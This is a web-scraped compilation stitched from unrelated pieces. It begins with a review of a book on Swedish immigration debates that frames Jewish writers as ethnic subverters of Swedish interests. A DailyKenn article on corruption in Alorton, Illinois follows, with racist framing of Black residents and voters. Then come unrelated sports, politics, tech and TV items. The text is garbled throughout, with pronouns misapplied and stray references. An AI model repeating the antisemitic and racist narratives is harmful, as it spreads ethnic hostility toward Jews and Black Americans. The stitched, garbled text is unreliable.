In the early 1960s, when the story begins, the most significant minority ethnic groups in the country were of northern European stock: Finns were most numerous, followed by Estonians and the Sami, or Lapps, native to northern Sweden itself.
But following the end of World War II, others began arriving. In 1963–4, calls for restricting immigration began to be heard. This helped spark a series of debates in the press on the status of ethnic minorities in Sweden. It is generally agreed that the multicultural policy formally inaugurated in 1975 had its origin in these debates; but as the author of the present study points out, the background of the debaters and their motivations have seldom been inquired into.
Their initiator and most important contributor was David Schwarz (1928–2008), a Polish-born Jew who arrived in Sweden in 1950 for medical treatment related to typhus and tuberculosis they had contracted while a concentration camp inmate in Germany.
On October 21, 1964, Schwarz published “The Foreigner Problem in Sweden” in Dagens Nyheter, one of several Swedish dailies published by the Jewish-owned Bonnier Group, writing:
Before the Second World War Sweden was relatively restrictive with regards to allowing in refugees. The need for labor was not as great as it is today, and some professions feared foreign competition. But by the end of the war the government's attitude changed, and over time 14,000 Jews and many others were transferred here from the German concentration camps. Simultaneously tens of thousands of Baltic refugees and several thousand stateless people fleeing the Russians came. Since then Sweden has continued to receive foreigners […] In other words Sweden got a large group of people, approximately 400,000, who were not born in the country.
Schwarz went on to argue that immigrant groups should face no pressure to assimilate; they should unconditionally be permitted to retain their cultural particularity. They recommended the appointment of a parliamentary inquiry with a view to formulating a culturally pluralist immigration and minority policy.
A week later, Schwarz's fellow Jew Inga Goldfarb wrote in support of their position, asserting that Sweden had “a need for different cultural groups,” and that their presence would “give our life new content.” Such vague, unsupported statements would become typical of the debate.
The author of the present study counts seventeen distinct debates on immigration and minority policy in prominent Swedish newspapers and magazines between 1964 and 1968, consisting altogether of 118 articles. Schwarz personally wrote or co-wrote 37 of these, or 31% of the total. They also initiated no less than twelve of the debates; no one else initiated more than one.
Adding in other Jewish contributions, we find that this smallest of established minority groups in Sweden was responsible for 46 articles, or 39% of the total, despite constituting less than 1% of the country's population. All Jewish contributors favored the multiculturalist position. The author has performed a valuable service in assembling this objective data, for discussion of the Jewish role in promoting multiculturalism in Sweden (as elsewhere) has often been dismissed as a “conspiracy theory.”
Ethnic Swedes contributed 19 articles to the debates, or 16% of the total, and were found on both sides. It may be significant, however, that the three Swedes who gave most support to the multiculturalist position co-wrote most of their articles with Jews.
Other groups contributed 38 articles (32%), and 15 articles are classed as “unknown” (e.g., unsigned editorials). Next to Jews, Estonians provided the strongest support for multiculturalism. Three Catholic immigrant contributors actually argued against the multicultural position.
If the passages quoted in Eckehard's book are representative, the arguments deployed by the multiculturalists do not seem to have been very sophisticated. “Sterile homogeneity” was contrasted with “enrichment.” Increased immigration in the future was alleged to be “inevitable.” Schwartz claimed that Swedes' abandonment of their ethnic interests domestically would somehow help them promote those same interests internationally. They portrayed cultural pluralism as a precondition for cooperation between groups and a key to avoiding conflict, although without explaining how assimilation could produce conflict and ignoring the social science data on the many costs of multiculturalism, including increased conflict, less willingness to contribute to public goods, etc.
Perhaps we shouldn't be surprised at the poverty of such reasoning. It was never the goal of minority activists to bring Swedes the (dubious) benefits of a pluralistic society, but only for Swedish ethnic interests to give way to their own.
Schwarz was very clear about placing responsibility for good intercommunal relations exclusively with the Swedish majority, writing, e.g., “It is the host population's responsibility to insure that insidious slander of foreigners (‘They're taking our houses', ‘they're taking our jobs' etc.) ceases.” — essentially proposing that empirical data on the effects of immigration on the labor market, ecological pressures and housing were off limits.
The most important representative of the assimilationist position was the ethnic Swede Michaёl Wächter, who wrote, e.g.:
Assimilation is not only a possibility but also the solution which in the long-run is the most conflict-free and therefore happiest for most people and society. In Swedish society the conditions for assimilation are extraordinarily good. In fact, that's precisely what concerns some individuals who are captive to their ethnocentric ideas, and so they call for help to protect their own localized interests.
Yet Wächter may have made some unnecessary compromises: e.g., accepting Schwarz's contention that responsibility for intergroup relations lies with the Swedes: “There should not be demands for the minorities to assimilate. The demand should be for society to create more opportunities for assimilation.”
Eckehart notes that “the argument that foreign minorities would let themselves be assimilated, and that such an assimilation was practically possible, was brought up on repeated occasions by the assimilationists and was one of the primary reasons they lost the debate.” This may have been plausible in regard to the northern European minorities of that time, especially given their small numbers; today, over 30% of Sweden's population is of foreign origin, and the largest groups include Syrians, Iraqis and Somalis.
Public discussion of immigration and minority issues was accompanied by increased political activity in the same area, with an average of thirty relevant bills being introduced into the Swedish legislature each year between 1965 and 1968. By comparison, the period 1945–60 had seen an average of three bills per year.
A review of the positions taken by the various political parties in the 1960s offers some surprises. The Right Wing Party [Högerpartiet] was the most active in proposing bills related to immigration. In August 1968, the party adopted the first political program that proposed extensive support for ethnic minorities in Sweden. This party subsequently changed its name to the “Moderate Party.”
The Social Democrats—with the crucial exception of rising star Olof Palme—were at first more skeptical of the new trend than one might expect. David Schwarz once related that, shortly before initiating the first newspaper debate, they had asked the Social Democratic Foreign Minister Torsten Nilsson at a public meeting how the government sought to solve the minority problem; Nilsson had said simply: “They'll have to become Swedes or move somewhere else.”
Hans Hagness, a Social Democratic legislator, made the following statement in parliament on December 9, 1966:
It is of course in the interests of the employers to increase cheap labor and keep wages down and this has been the motivation that has been supported by the bourgeois newspapers. They've also organized sob stories about deportations and how bad we should feel for them. But one cannot build a policy on sob stories featured in liberal newspapers; instead we are obliged to pursue a conscious policy in the interests of the average worker.
In short, the Swedish left still thought in terms of social class.
In 1966, David Schwarz obtained a meeting with Social Democratic Prime Minister Tage Erlander through the latter's speechwriter Olle Svenning. Svenning later recalled:
The old PM agreed to meet and brought their considerably younger assistant Olof Palme. [Schwarz] explained how important multiculturalism was, that Sweden already was a nation of immigrants and how the demands for linguistic and religious tolerance were growing strong. Palme, having been raised in a multicultural and multilingual environment, understood what David was talking about.
The following year Palme, now Minister of Education, announced their endorsement of multiculturalism in a speech at the Stockholm Jewish Center amid praise for Israel and the aspirations of Zionists. Yet this same man was so hostile to any display of Swedish patriotism that they expressed distaste for Sweden's innocent Flag Day celebrations! Two years later, Palme succeeded Erlander as Sweden's Prime Minister.
Another crucial landmark on the road to Swedish multiculturalism came in 1967 when the Swedish Trade Union Confederation reversed its opposition. Yet the reasons for this momentous change of heart remain obscure; historian Thomas Gür has written:
In literature dealing with Swedish immigration policy I have not found any accounts detailing the background and motives for [the Trade Union Confederation's] stance on the matter. Nor is there any explanation in works dealing with [the Confederation's] history.
As elsewhere in the West, the Swedish left was shifting its thinking from a class-based model of society to one centered on race and ethnicity. We have certainly seen the material interests of union members sacrificed to ethno-pluralist ideology elsewhere as well: notably America's AFL-CIO.
The final result of the debates and political activity of the period 1964–68 was the appointment by the Swedish parliament of the Immigrant Investigation, with the task of studying the status of immigrants and minorities in Sweden. This body's recommendations were released in 1974, and coincided almost perfectly with the arguments of David Schwarz and other multiculturalists.
The Immigration Investigation's recommendations became the basis for government bill 1975:26 which formally declared that “Sweden was no longer a nation dominated by Swedish culture, but a culturally pluralist society where different minority cultures were going to be allowed to thrive.” The bill was unanimously passed by the Swedish parliament in 1975. It had only been eleven years since David Schwarz published their first essay.
As Eckehart points out, the dynamic which led to the rapid triumphal march of multiculturalism in Sweden is perfectly expressed in this observation by ethnologist Frank Salter:
Minorities have an advantage in ethnic competition in being more mobilized than majorities. Mobilization is the willingness to make sacrifices for a cause, for example, by donating money, time and work. Even a small group with limited resources can exercise disproportionate influence when its members are highly mobilized and its opponents, though superior in numbers, are indifferent.
The curse of Democratic states in our time has proven to be not the “tyranny of the majority” predicted by Alexis de Tocqueville, but a “tyranny of the minorities”—of highly motivated and politically activist minorities over naïve and complacent native majorities.
As the author observes, nearly all political changes produce winners and losers. In the shift from an assimilationist to a multicultural policy, non-Swedes living in Sweden gained a victory for themselves by persuading the native Swedish population to cede sovereignty over the only geographic area in the world solely dedicated to the Swedish people and Swedish culture.
Randy McCallum, the former mayor of Alorton, Ill.,
leaves the federal courthouse in East St. Louis, Ill.,
Friday, Feb. 24, 2012, after pleading guilty
to stealing $1,000 from the southwestern
Illinois village and attempting
to deal crack cocaine.
The 46-year-old went free on bond.
Mayor Randy “Rambo” McCallum Sr. came into office telling cops, “I run this mother___” and ordered them to rob competing drug dealers and split the money with him. When drug dealers were busted, the seized drugs and money were brought to their house where they pocketed the money and resold the drugs.
McCallum Sr. stole so much money that there were no bank deposits for a year. When an undercover informant went to their house, they found crack cocaine on the kitchen table being prepped for sale.
Alorton's police chief, Michael Baxton Sr., set up surveillance cameras in the police station that they could monitor from home to alert Mayor McCallum when the seized drugs and money were coming in.
The police chief went down for stealing Xbox video games from the trunk of a stolen car telling another cop, “This ain't (expletive), I'm gonna put you on some real (expletive), teach you how to be real police.”
Their son Michael Baxton Jr. remained on the Alorton police force where they were hit with three Federal lawsuits for physically abusing people. They briefly became the police chief of East St. Louis until two black board members won a lawsuit because after they were harassed for supporting a more qualified white candidate for the job.
Baxton Sr. had replaced Alorton's former police chief, Robert L. Cummings, who had been locked up for income tax fraud that included paying the parents of eight children to let them claim tax deductions for their offspring. Their brother, Streets Superintendent Ronnie Cummings, who had a previous conviction for selling cocaine, was locked away for attempting to obtain a high capacity gun that they planned to fire through a bag to catch spent casings.
Corey Allen, Alorton's interim police chief who replaced Baxton, later went on to be indicted for selling a gun to a sex offender who was running from police at the time. While waiting to go to prison, they beat and choked a woman who told their girlfriend that they were their mistress. In between their duties as assistant police chief in Centerville and their criminal activities, they also owned a car wash and played the sax under the name “Sax-Mo.”
Like Luvina, Mayor McCallum's son, Randy McCallum Jr. followed the family tradition and was charged with a double murder committed while they were under electronic monitoring for yet another crime. Even though one of the murdered men placed a recorded 911 call naming McCallum Jr. as the killer, the trial ended in a hung jury because a holdout juror was facing a battery charge for attacking the killer's cousin.
Other jurors identified them from their mugshot.
Meanwhile during the time that McCallum Jr. was in prison and their father was still the police chief, McCallum Sr. admitted smuggling marijuana cigarettes to their son.
Determined not to let Alorton's police department hog all the glory, fire chief Carlos Darough's car was searched after they ran a stop sign. Inside the car were pot, crack cocaine and a scale. When cops showed up at their house, Carlos' wife Lanella was caught trying to dispose of more drugs. At another of their homes where undercover police had bought drugs, they found more cocaine and a whole lot of guns.
Carlos had already been on probation after serving eight years in prison for a cocaine conviction. They had been with the Alorton fire department since they were 14 and had been repeatedly arrested over two decades on a variety of charges ranging from drugs to domestic violence.
Alorton's Public Safety Director, Harry “Dink” Halter, a former police officer and tow truck operator, who had already been arrested for forcing a female driver to perform a sexual act on them and gotten away without being forced to register as a sex offender, was charged with wire fraud and tax evasion for, among other things, taking a grant that Mayor McCallum Sr. gave them to put a fence around their tow yard, kicking back $800 to the mayor and using the rest to pay for their boating expenses.
Mayor JoAnn Reed, Alorton's current mayor, faced their own set of charges before the election for smuggling a cell phone into jail after their niece had attacked a pregnant woman. The niece posted “I'm in jail but auntie snuck me my phone don't tell no 1″ on Facebook.
Despite these charges, Reed won the election.
Reed went on to become deputy clerk and then mayor after Mayor Tremylla Johnson was charged with violations of the Illinois Open Meeting Act. Johnson had pledged to restore the confidence of voters in the integrity of Alorton City Government after the arrest of McCallum, but had been appointed mayor at a secret meeting held in their house.
In response to the charges, Mayor Tremylla Johnson resigned for 3 minutes and was reappointed as mayor by a majority of trustee votes, including their own.
These stories can go on being told forever not just about Alorton, but about hundreds of Democratic Party controlled towns, villages and cities. What these places have in common is that their corruption emerges from the absolute rule of one party.
By giving away their votes wholesale to the Democratic Party, African-Americans have handed over power to a corrupt political machine that offers them no alternatives; only poverty, theft and misery.
✓
Like this story?
Help Kenn spread the word by clicking it onto Facebook. See icon below . . .
Permission is granted to use the material in this article providing (1) the byline is included
in an obvious manner
crediting DailyKenn.com as the author, (2) a link to this page is included and (3) no changes are made either by deletion, addition or annotation. Original compositions at DailyKenn.com are sometimes seeded with decoy data, such as hidden acronyms, to detect unauthorized use and plagiarism.
COMMENTS: The use of vulgarities and pejoratives may result in your comment being zapped.
There are only 2,750 people living in Alorton, Illinois. The town is virtually all black with fewer than 50 residents who are white, Hispanic, or other.The violent crime rate has been ten times the national average.Located in Illinois the town is situated in East St. Louis.The community appears to be governed more like an African village than an American town. Randy “Rambo” McCallum Sr., the village chief, or mayor, came to power telling police, “I run this mother___”. The cops were ordered to rob competing drug dealers and split the money with him.St. Clair County State's Attorney Brendan Kelly referred to the town as "a criminal narco state" for good reason.I don't take cash from readers. But you CAN help me when you LIKE DailyKenn.com on Facebook. Click thebelow.
TAMPA, Fla. -- Tampa Bay Buccaneers new rookie linebacker Kendell Beckwith is used to getting in on the action. The third-round draft pick had a knack for exceptionally hard hits at LSU. But in rookie camp last week, they were forced to stand on the sideline. He's been recovering from a torn ACL suffered on Nov. 19 of last year and has not been able to practice.
"It's tough," Beckwith admitted. "It's definitely a little boring sitting back watching because I'm such a competitor, but it's just a process. I've got to take my time with it and hopefully I'll be ready."
Bucs general manager Jason Licht and their scouting department had been watching Beckwith the last two years. They also had insight from their former teammate, Bucs starting middle linebacker Kwon Alexander, and saw a strong track record of LSU linebackers in the NFC South. That made them comfortable not only drafting Beckwith, but trading back into the third round to select them despite the injury.
"He got hurt so they slid a little bit because of it," Licht said. "We're anticipating – I mean, we haven't got our hands on them besides physicals during this process [and] you want to be around a guy everyday to know exactly where they are – but we're very confident he's going to be ready this season. [It] could be July that he's ready to go."
Beckwith added, "[The recovery] is going really good. I'm feeling pretty good right now. I'm just trying to do a good job of following the trainers' lead."
Official training camp dates have not been announced yet, but it will be sometime around the end of July. The expectation there is that he'll compete with Devante Bond for the strongside linebacker role, replacing veteran Daryl Smith.
While Beckwith played middle linebacker as a three-year starter in college, they welcome the change.
"It's definitely a switch, but I'll line up and play anywhere," Beckwith said. "If that's what they want me to do, I'll do it. ... I'm a competitor. I'm willing to work and really willing to compete for that job."
Alexander also had to make a change when they got to the next level. They played outside at LSU and moved inside when they were drafted by the Bucs.
Beckwith joked, "If they want me to go back and play safety, some corner, maybe a little wideout, I'll do that too. High school my senior year was probably my last time doing that. It's been a while, but I think I still got it."
At 6-foot-2, 243 pounds, Beckwith has the size to make the transition to the SAM spot and has the downhill, physical style that is needed for Mike Smith's defense. And unlike the MIKE position, they don't need to be great in coverage because they won't be on the field for every snap. Alexander and Lavonte David will handle that.
"He has played with their hand down -- he's rushed, he's played on the line of scrimmage," Licht said. "So those are all things that you look for in a SAM, being able to butt heads and play physical."
According to Pro Football Focus, Beckwith made a stop on 11.7 percent of run snaps last season, fourth among SEC linebackers. Meanwhile, the Bucs allowed 2.8 yards per rush before first contact last season, seventh-worst in the NFL, so he'll be a welcome addition.
They just have to show a little patience first.
Ever since the summer, Vanderbilt has tried to convince itself that it could compete with Alabama.
The Commodores' head coach Derek Mason told reporters at SEC Media Days in July they didn't fear anybody, including the Crimson Tide. Then, eight days ago, Nifae Lealao -- overcome with exuberance in the afterglow of a surprising victory over Kansas State -- called out the No. 1 team in the nation with the bravado of a pro wrestler.
"You're next," Lealao shouted into a television camera.
It was a cheeky remark -- one that may have been dismissed amid rounds of laughter in the past.
Yet some were willing to buy into the hype percolating around Vanderbilt, which had the No. 1 scoring defense in the country, won its first three games and hovered just outside the Top 25 in both polls before Saturday.
These Commodores, they believed, were different. Even CBS was willing to give Vandy its day in the sun, bringing its cameras and satellite truck to Nashville for the first time in two years to showcase the SEC Game of the Week.
But then everyone was reintroduced to reality soon after kickoff.
Alabama was still the dominant, fearsome outfit it's been for years while the Commodores were the overwhelmed SEC team they've been throughout their forgettable existence in the football-mad South.
These roles have long been established and reinforced season after season. Vanderbilt hasn't defeated Alabama in 33 years and on Saturday it never even posed a threat to the Tide, which walloped the Commodores in a 59-0 rout. The Tide set records in the process, picking up more first downs -- 38 -- than it ever has before in a game. It also amassed 599 yards more than Vanderbilt -- the largest margin Alabama has posted against an opponent in its long history.
"At Alabama, we want to be respected," said quarterback Jalen Hurts. "Usually we are. I guess we felt like we didn't have the respect that we kind of wanted coming into the game. So we came out and tried to play Alabama football."
For the Commodores, that meant they were going be subjected to 60 minutes of pure misery. Alabama was determined to blast through Vanderbilt's defense by opening gaping holes for its stable of talented running backs. The Tide ran for 496 yards, trampling the Commodores in the opening quarter when it scored three touchdowns and set in motion an onslaught of the ages.
Alabama also was relentless in its pursuit of Commodores quarterback Kyle Shurmur. The Tide consistently dented their pocket, forcing them to rush their throws. Shurmur, who had the highest efficiency rating in the SEC before this weekend, passed for 18 yards and completed only four of their 15 attempts before they were yanked when all hope was lost early in the second half.
By then, Vanderbilt had surrendered against a scorned Alabama squad, which conceded only three first downs and didn't allow Vanderbilt past its own 44-yard line.
"We don't like when when folks do all that talking and stuff," said defensive lineman Da'Ron Payne. "We just like to go out and play."
Alabama, in the most clinical way, stripped away the Commodores' confidence -- peeling it off in cold fashion with its precise offensive execution and stinginess on defense. The Tide controlled the ball for 42 minutes, 55 seconds and had Vanderbilt in a death grip from beginning to end.
"We knew we could come out fast, we knew we could make big, explosive plays," said running back Damien Harris said. "But it's about finishing."
It was more than that. It was about making a statement with the destruction of a traditionally-weak conference opponent that dared to think it could stand up to the Tide.
Describing Alabama's mission this week, Hurts didn't mince words.
"To dominate," they said. "To dominate."
And remind everyone that Alabama is still Alabama and Vanderbilt is still Vanderbilt.
Rainer Sabin is an Alabama beat writer for the Alabama Media Group. Follow them on Twitter @RainerSabin
The Los Angeles Rams are the 2017 NFC West champions. The Rams organization has claimed the division title for the first time since 2004 when they were in St. Louis. Without a doubt, it was not the best game of the season for the young team. Despite a shaky game, Connor Barwin took down Marcus Mariota to close out Tennessee's final possession.
Todd Gurley was beyond dominant yet again, totaling over 250 all-purpose yards and two touchdowns. The offense looked to be marching down the field out of the gate, but their drive fizzled out. This was in large part due to an unwillingness to attempt a 50-yard field goal with new kicker Sam Ficken. The defense wasted no time getting them the ball back, quickly intercepting a Mariota pass. For the eighth time this season, the mob squad defense had forced a turnover on the opening possession. L.A. capitalized, getting right down the field and finishing the drive off with a Jared Goff touchdown pass to Gurley. However, Ficken failed to hit the extra point.
The Titans ran the ball effectively down the field on the ensuing possession, setting themselves up for a chip shot field goal. When the Rams turned around and got into field goal range trying to answer, Ficken clanged the kick right off the upright. When the Rams defense stepped up to stop the Titans, the Rams were pinned deep. On the first play, when Goff turned to hand off to Gurley, Jamon Brown missed their assignment and got Goff blown up for a fumble, which was promptly returned for a Titans touchdown.
With things quickly seeming to get out of hand for L.A., Gurley put the team on their back and flipped a switch. After a one-yard rush, Gurley took a screen pass 80 yards for a touchdown. Goff now had two touchdown passes on the day, and they would notch two more to Cooper Kupp and Sammy Watkins.
In the second half, the Rams defense struggled to handle the Titans offense, primarily when facing a no-huddle look. The biggest issue was the Rams inability to get home with the pass rush, much like when they faced the Vikings many weeks ago. Even when they created pressure they frequently were unable to fully contain Mariota, something did so well last week against Russell Wilson.
After the Rams scored two touchdowns behind a beautiful Kupp catch and a Watkins goalline slant, all the young team had to was hanged on. On their final drive Mariota and co. gave the Rams a run for their money, but things fizzled out just over midfield.
In a very unconventional game that saw many strange events, such as an onside kick before the Rams were even on the field that was later nullified by a timeout that wasn't really a timeout, the Rams found a way to get their 11th win of the year. Goff had a big day by the numbers but actually struggled. Gurley was ridiculous, yet again. And, Kupp bounced back from a drop just like they have all season long.
Most Valuable Player – Todd Gurley
Gurley was incredible for the second straight week. Being awarded MVP of this game should be symbolism for Gurley winning NFL MVP this year. The star running back went for over 100 yards rushing and over 150 yards receiving. On top of that, the Rams extended their record to 9-0 when their workhorse back touches the ball more than 20 times throughout the course of the game. After Ficken left plenty of points on the board the Titans returned a fumble for a touchdown, who picked the Rams up? Gurley, of course, was there as they have been all season. The Rams can break teams down through the air or on the ground, but so much of what they do through the air also revolves around the screen game.
Least Valuable Player – Sam Ficken
Ficken was a liability in their first game as a Ram, and it would not be too shocking if it was their last. The Rams tried out 12 kickers last week when they were forced to place Greg Zuerlein, who was elite all season, on Injured Reserve. It is difficult to think that not one of those kickers from the try out could have performed better than Ficken. The good news is that the new man booting the ball for L.A. found their way later in the game, hitting three straight extra points. If the Rams elect to keep Ficken around it is possible that they prove their first two misses were pure nerves from their first NFL action. But, is it okay to have a kicker who is that affected by nerves?
TG2K
Rams running back Todd Gurley eclipsed 2,000 yards from scrimmage for the season on Sunday. A very impressive number, Gurley has been incredibly effective through the air and on the ground. The definition of a three-down back, they play a higher snap count than most running backs in the league. Sean McVay's system has allowed Gurley to flourish, getting them the ball in space. Talking about their role in the passing game earlier in the season, Gurley said: “It's nice having to get past one guy instead of all 11”. While the answer seems simple, it is very true. Gurley often catches the ball on screens with a convoy of blockers. Rodger Saffold is notably excellent in the screen game and their rib injury sustained Sunday is hopefully minor.
The Rams back came into this season hoping for 2,000 rushing yards and 1,000 receiving yards, but it is impossible to be disappointed in the season they are having.
Rams Outlook
The Rams next matchup will be with the San Francisco 49ers on New Year's Eve. While the Niners were nowhere near a factor in this season's playoff race, they have found new life with quarterback Jimmy Garoppolo. Now 4-0 with the new man under center, the Rams will look to end the Niners season on a more negative note. For the Rams, it is one final tune-up before heading into the playoffs. With seeding not locked into place, it seems unlikely that the Rams would give any of their players rest, but a smaller workload to keep Gurley fresh would not be shocking. Follow along this week for all the news regarding Sunday's game.
– Andrew Kelly is the Managing Editor for Full Press Coverage Rams. They cover the Los Angeles Rams and is also the Divisional Editor for the NFC West. Like and follow-on Follow @Andrew_K47 Follow @FPC_Rams and Facebook
Advertisements
Share this: Tweet
Like this: Like Loading...
(Newser) – President Trump defended their throwing of paper towels to Puerto Rican hurricane victims in a weekend interview on a Christian network—and claimed to have invented the term "fake." The towel-throwing, which San Juan Mayor Carmen Yulin Cruz described as "terrible and abominable," was simply a bit of fun with the crowd at a distribution center, Trump told Mike Huckabee on Trinity Broadcasting. "They had these beautiful, soft towels. Very good towels," Trump said, per NBC News. The crowd was "loving everything. I was having fun, they were having fun," they said. "They said, 'Throw 'em to me! Throw 'em to me, Mr. President!" Trump accused Cruz of "doing a very poor job" with their hurricane response.
Trump went on to boast about the term "fake." "I think one of the greatest of all terms I've come up with is 'fake,'" they said. "I guess other people have used it, perhaps, over the years, but I've never noticed it." It wasn't entirely clear whether they were taking credit for "fake" or "fake news," but they would be wrong in either case, according to CNN, which Trump often accuses of creating "fake news." The word "fake" has been around for 200 years, while the term "fake news" started appearing in newspapers in the late 19th century. On Sunday, Trump tweeted that nobody could have done what they did in Puerto Rico "with so little appreciation." They also shared a video of hurricane relief efforts "that the fake news media won't show you." (Read more Puerto Rico stories.)
As Chinese e-commerce giant Alibaba prepares for what may well be the world's largest IPO, the company quietly announced technology that may well put competitors like Amazon, Google and PayPal on the back foot.
On Alibaba's blog, the e-tailer posted news of its soon-to-launch fingerprint reader, allowing shoppers to make payments on their smartphones without the hassle of passwords:
"The biometric technology...will allow mobile users to confirm payments for a wide variety of goods and services with their smartphones simply by swiping a digit instead of entering a lengthy code."
Alibaba, founded by billionaire and one-time Forbes cover story subject Jack Ma, teamed up with Chinese telecoms outfit Huawei to integrate this new biometric technology into its Alipay Wallet app.
It'll be available for use with Huawei's Mate 7 smartphone, due to be launched this week.
Alibaba touted the security of its fingerprint function versus the past efforts of traditional mobile companies in its post, saying:
Biometric technology such as fingerprint or retina recognition is touted as a more secure and convenient of method of identity authentication. Banks, governments, credit-card companies and mobile phone manufacturers have been exploring possibilities in the industry, but the development path has some potholes. Fingerprint readers on Samsung's Galaxy 5 and Apple 's iPhone 5 have been successfully hacked, defeating the security function that prevents unauthorized use. Alibaba may not be leading the pack with its fingerprint technology for long. In an interview with tech site CNET days ago, Rick Bergman of Synaptics , a company developing fingerprint readers for gadgets, revealed what they think is the next big leap for mobile: eyeball-tracking.
Would you be happy to pay via mobile phone with your fingerprint? What about your eye? Leave comments below.
Newcastle have won just two of their 14 Premier League games under John Carver
Newcastle boss John Carver has invited two fans who were part of a group who confronted them in Saturday's defeat by Swansea "for a cup of tea" to discuss their grievances.
Carver, 50, was involved in a heated exchange with several home fans as Newcastle lost 3-2 at St James' Park.
It was their seventh straight defeat and leaves them five points above the Premier League relegation zone.
"It's important I explain some of my actions," said Carver.
"I don't have to, but I think it's important. I'm one of them - and I want them to see I can relate to them and give them a bit of time.
"It'll be interesting to see what they say, it won't all be me me me, it will be a two-way conversation."
Newcastle fans vent their frustration at Carver (fourth right) at the weekend
Carver, who has a contract until the end of the season, has come under pressure because of Newcastle's poor run of form under him.
Since former manager Alan Pardew left to take charge of Crystal Palace, Newcastle have won just two of their 14 Premier League games.
Carver plans to allow the two fans to see how they prepare for Saturday's game at Leicester.
They added: "I'll show them a little of the preparation going into the game so they have some understanding - without giving away too much of the team - and the planning we put into the week.
"It's not to get them in to have a roll around the office. I'm happy to answer their questions and have a really good conversation and say 'this is what we do'.
"I'm not one looking for sympathy but it's about getting them to understand better."
Pro-Russia Rebels Say They Will Settle For Autonomy In Ukraine
Enlarge this image toggle caption Jia Yuchen/Xinhua /Landov Jia Yuchen/Xinhua /Landov
Update at 3:21 p.m. ET
Pro-Russia rebels in Ukraine are no longer demanding full independence, telling negotiators in Belarus that they will respect Ukraine's sovereignty in exchange for autonomy.
The Associated Press adds:
"It's a shift that reflects Moscow's desire to strike a deal at a new round of peace talks — possibly avoiding tougher Western sanctions. The talks follow last week's meeting between the presidents of Russia and Ukraine. Similar talks earlier this summer produced no visible results."
Today's talks in Minsk, the capital of Belarus, lasted for several hours before being adjourned until Friday.
Earlier Monday, Russian Foreign Minister Sergei Lavrov said the meeting's goals should be a cease-fire, but they demanded that Ukrainian troops leave positions from which they can "harm the civilian population."
Karoun Demirjian, who is reporting for NPR from Moscow, tells our Newscast unit:
"[A] rebel leader in Donetsk told Russian news service Interfax that their main goal is to win recognition of their independence from Kiev. "During a television interview, Russian President Vladimir Putin said statehood in eastern Ukraine should be one of the topics up for discussion; the Kremlin stressed, though, that Russia isn't directly supporting calls for independence. "Meanwhile, Ukraine's military spokesperson says that Russian formations were directly firing on troops at the Luhansk airport overnight. Russian-backed separatists say they seized the airport today."
Monday's meeting in Minsk comes a day after a Ukrainian border guard vessel was attacked near the eastern Ukrainian port city of Mariupol.
NPR's Soraya Sarhaddi Nelson, who is reporting from Mariupol for Newscast, says Ukrainian officials blamed Russian-backed separatists for the attack on the vessel patrolling in the Sea of Azov. They add: "The separatist fighters last week launched an offensive along the coastline and now control several towns and villages here."
The crisis in Ukraine has resulted in the worst ties between Moscow and the West since the end of the Cold War.
Indeed, Sen. Robert Menendez, D-N.J., chairperson of the Senate Foreign Relations Committee, told CNN on Sunday that the U.S. should "provide the Ukrainians with the type of defensive weapons that will impose a cost upon Putin for further aggression."
Sen. John McCain, R-Ariz., echoed those calls in an interview with CBS' Face the Nation.
"Give them the weapons they need," they said. "Give them the wherewithal they need. Give them the ability to fight."
In a news conference last week, President Obama blamed Russia for the violence in Ukraine. The administration's actions against Russia have so far mainly been limited to economic sanctions on Russia's banking, energy and defense sectors.
"Capital is fleeing, investors are increasingly staying out, their economy is in decline," Obama said last week. "This ongoing Russian incursion into Ukraine will only bring more costs and consequences for Russia."
It's finally arrived: the finale of American Horror Story: Roanoke. But with only an hour left in the most head-scratching season yet, can Ryan Murphy really wrap up all the mysteries that are still up in the air?
To be honest, probably not.
Fortunately, all the seasons are connected, so it's entirely possible Murphy will dive deeper into some of the Roanoke mythology in future seasons of Horror Story — not that we want to wait that long. Here are the 16 questions we want answered ASAP.
1. Why did the Polks allow themselves to be outbid for the house? If the Polks have enough money to pay off the police, why couldn't they pony up a mere $40,000 to buy the house? The Polks are weed moguls! There is no way they don't have $40,000 on hand.
2. Why aren't there more ghosts? Out of everyone who died during My Roanoke Nightmare and Return to Roanoke, the only people we've seen return as ghosts are Diana and Mason. And before you say, "Only ghosts killed by the Butcher or doing the Blood Moon return," Mason was killed ahead of the Blood Moon and Diana was killed by Piggy Man. So that theory = debunked.
If that's the case, where's Cricket (Leslie Jordan) and Elias (Denis O'Hare)? What about Rory (Evan Peters), Matt (Andre Holland), Dominic (Cuba Gooding Jr), Agnes (Kathy Bates), Sidney (Cheyenne Jackson) and Shelby (Lily Rabe)? And why do the previously established ghost rules seemingly not apply this season?
3. What is the significance of the stick figures? These stick figures have appeared throughout the season and were always tied to one of the Butcher's appearances. But why? What purpose do they serve? What do they say about the colonists other than that they've seen Blair Witch one too many times?
4. Was Lee always under the influence of Scathach? The penultimate episode saw Lee (Adina Porter) eat a boar's heart and become a bootleg version of the Butcher. But was this the first time Lee was under the evil influence of Scathach, or was they also serving the Witch of the Woods during the events of My Roanoke Nightmare? If so, is that why Lee allegedly killed Mason? And speaking of Mason's death...
American Horror Story: Everything to know before Lana Winters' return
5. Who killed Mason? Lee confessed to murdering Mason, but there's something about their admission that doesn't ring true. When they admitted to killing their ex-husband, Lee believed they were about to be murdered. With nothing left to lose, it would make sense for Lee to confess to killing Mason if their intention was to cover for the real killer — their daughter perhaps?
Flora, who hasn't actually appeared yet (only the actor playing them in the reenactments has appeared) is one of the most mysterious characters of the season. Unlike the rest of their family, Flora was clearly friendly with most of the ghosts, who — according to Shelby, Matt and Lee's version of events — played a nice game of Marco Polo with Flora instead of murdering them when they were missing. Is this because she's just as evil as them? Is the reason they welcomed Flora because she's already dead? We demand answers, dammit!
6. Who is Rhett Snow really? It can't be a coincidence that Rhett was the Uber driver for both Cricket and Dylan (Wes Bentley) shortly before their untimely deaths. I also refuse to believe it's a coincidence that Rhett shares a last name with Coven favorite Myrtle Snow. Are they related to everyone's favorite red-headed witch? Could they know more about the Roanoke ghosts than they initially let on? At least one of these conspiracies has to be true, right?
American Horror Story: Roanoke reveals the sole survivor
7. Who was the first person we saw the Butcher kill? "Chapter 1" ended with Shelby discovering a man who had been scalped by Scathach. "Chapter 2" picked up with the Butcher nailing a pig's tail to this same man, putting a dead pig's head over theirs and then spit-roasting them as punishment for stealing goods and attempting to desert the colony. The following night, Shelby and Matt discover what appear to be entrails (possibly the man's, possibly a pig's) strewn over a burning effigy. But can you scalp a ghost, let alone roast and disembowel them? It just doesn't make sense.
